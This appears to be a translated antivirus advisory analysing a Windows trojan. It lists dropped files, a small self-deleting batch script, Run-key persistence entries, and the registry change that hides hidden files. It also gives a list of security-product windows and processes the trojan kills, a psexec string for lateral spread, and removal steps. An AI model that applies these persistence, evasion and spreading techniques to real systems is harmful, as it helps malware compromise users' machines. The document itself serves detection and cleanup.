Files released:
C:\setup.exe
size:28,672 bytes
C:\Documents and Settings\user\Local Settings\temp\rs.bat
size:105 bytes
%windir%\system32\microsoft.exe
size:28,672 bytes
%windir%\system32\sp00lv.exe
size:28,672 bytes
%windir%\system32\drivers\svchost.exe
size:28,672 bytes
D:\Setup.exe
size:28,672 bytes
E:\setup.exe
size:28,672 bytes
F:\setup.exe
size:28,672 bytes
The content of rs.bat is:
@echo off
:start
if not exist ""%1"" goto done
del /f ""%1""
del ""%1""
goto start
:done
del /f %t
Registry entries added:
hkey_local_machine\system\controlset002\services\winnet COM +
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Internat"
Type:reg_sz
Data:c:\windows\system32\microsoft.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Program Files"
Type:reg_sz
Data:c:\windows\system32\sp00lv.exe
Registry entries modified:
hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall "CheckedValue"
Old data:01, 00, 00, 00
New data:00, 00, 00, 00
(modified so that the system does not show hidden files)
hkey_local_machine\system\currentcontrolset\control\deviceclasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196}\##?#pci#ven_8086&dev_24c5&subsys_4720414c&rev_02#3&13c0b0c5&0&fd#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#Wave\device Parameters\mixer\0\ (mutes the system)
Closes windows containing the following strings:
Security guards
Scanning
Specially killed
Registration Form
Process
Process
Poison
Trojan
Defense
Firewall
Virus
Detection
Firewall
Virus
Anti
Jinshan
Jiangmin
Kaspersky
Worm
360
Micro Point
Micropoint
Nemesis
Advertising
Avk
Kaspersky
F-secure
Escan
Norton
Norton
Mcafee
Virus
Panda
Panda
Trojan
Door
Avg
360tray.exe
Ravtask.exe
Ravstub.exe
Ravmond.exe
Ravmon.exe
Ccenter.exe
Rfwstub.exe
Rfwproxy.exe
Rfwsrv.exe
Rfwain.exe
Ras.exe
Runiep
Disassembly reveals the string: %s\psexec.exe \\%s -u %s -p %s -c %s\servrr.exe -
and the use of http://tools.hxstat.com/ip/ to get the IP address.
Solution:
Use SREng to remove the startup items []
[]
Delete the service [winnet COM + / winnet com+] [Stopped/Auto Start]